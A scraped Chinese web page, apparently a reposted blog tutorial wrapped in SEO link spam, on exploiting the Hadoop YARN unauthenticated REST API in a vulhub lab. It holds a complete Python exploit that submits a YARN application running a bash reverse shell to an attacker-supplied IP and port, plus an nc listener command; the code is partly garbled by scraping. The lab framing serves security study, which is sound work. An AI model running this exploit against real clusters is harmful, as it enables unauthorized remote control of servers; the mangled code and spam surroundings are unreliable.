当前位置: 首页 > news >正文

百度采购网官方网站wordpress新增php页面

百度采购网官方网站,wordpress新增php页面,佛山便宜网站建设,企查查官网查企业网页版数据库安全#xff1a;Hadoop 未授权访问-命令执行漏洞. Hadoop 未授权访问主要是因为 Hadoop YARN 资源管理系统配置不当#xff0c;导致可以未经授权进行访问#xff0c;从而被攻击者恶意利用。攻击者无需认证即可通过 RESTAPI 部署任务来执行任意指令#xff0c;最终完…数据库安全Hadoop 未授权访问-命令执行漏洞. Hadoop 未授权访问主要是因为 Hadoop YARN 资源管理系统配置不当导致可以未经授权进行访问从而被攻击者恶意利用。攻击者无需认证即可通过 RESTAPI 部署任务来执行任意指令最终完全控制服务器。 目录 数据库安全Hadoop 未授权访问-命令执行漏洞. Hadoop 未授权访问-命令执行漏洞 开启 vulhub 靶场环境 Hadoop 未授权访问-命令执行漏洞测试 Hadoop 未授权访问-命令执行漏洞 开启 vulhub 靶场环境 第一步切换到 vulhub 目录下 cd vulhub 第二步切换到 hadoop 目录下 cd hadoop 第三步切换到 unauthorized-yarn 漏洞目录下. 第四步开启 漏洞 服务. docker-compose up -d 第五步访问  http:// (靶场 IP 地址):8088 Hadoop 未授权访问-命令执行漏洞测试 第一步访问 /cluster/apps 页面【如果 该页面存在的话说明存在未授权访问漏洞】 http://192.168.0.106:8088/cluster/apps 第二步在 攻击机kali设置监听. nc -nvlp 8888// 设置 监听 端口为8888 第三步编写 Python 执行代码. import requestsdef shell(url,vps_ip,port):headers {User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36}response requests.post(url/ws/v1/cluster/apps/new-application,headersheaders)id response.json()[application-id]data {application-id: id,application-name: getshell,am-container-spec: {commands: {command: /bin/bash -i /dev/tcp/%s/%s 01%(vps_ip,port)},},application-type: YARN}exploit requests.post(url/ws/v1/cluster/apps,headersheaders,jsondata)print([] 执行完成)if __name__ __main__:url input(目标的URL:)vps_ip input(监听的主机IP地址(kali):)port input(监听的主机端口(kali):)shell(url,vps_ip,port) 执行代码 第四步返回 监听的主机查看结果发现已经成功. 参考文章Hadoop 漏洞复现_hadoop命令执行漏洞-CSDN博客 学习链接第55天服务攻防-数据库安全_Redis_Hadoop_Mysql_未授权访问_RCE_哔哩哔哩_bilibili
http://www.tj-hxxt.cn/news/130240.html

相关文章:

  • 模仿别人的网站5173游戏交易网站源码
  • 工作中存在的问题和不足谷歌seo 外贸建站
  • 网站设计开户邢台开发区网站
  • 园岭网站建设wordpress博客转出
  • 青岛网站建设与设计制作问答社交网站开发
  • 海南网站开发公司wordpress浮窗插件
  • 一整套ppt背景图片去哪优化网站关键词
  • 网页登陆界面怎么做seo研究中心倒闭
  • 手机网站幻灯片安装了wordpress程序
  • 部署一个网站大概多少钱网站建设工作室是干嘛的
  • 滨海网站建设无锡网站制作哪些
  • wordpress如何优化网站速度企业展示类网站模板
  • 做网站做的好的公司有哪些佛山做网站制作公司
  • 北京好用的h5建站网站关键词在哪里看
  • 北京网站建设定制做网站需要相机吗
  • 安徽省博物馆网站建设安装app软件
  • 沈阳网站设计开发一个网站需要哪些技术
  • 徐州做网站的设计师贷款织梦网站模版
  • 企业内部网站建设方案吾道ppt模板免费下载
  • 网站建设数据库是什么东莞东城网站建设
  • 佛山网站开发哪家专业东莞网络营销推广软件
  • 浙江省建设厅网站 学时辽宁做网站
  • 深圳鸿运通网站建设洛可可成都设计公司
  • 网站关键词搜不到科协网站建设的建议
  • 月编程做网站那些网站建设的好
  • 网站建设话术关键词微信api文档
  • 大气的个人网站简约网站版式
  • 义乌进货网平台自己的网站做怎样的优化调整
  • 网站服务器崩溃一般多久可以恢复济南迅翔网站建设
  • 六安市 网站集约化建设网站开发人员工资计入无形资产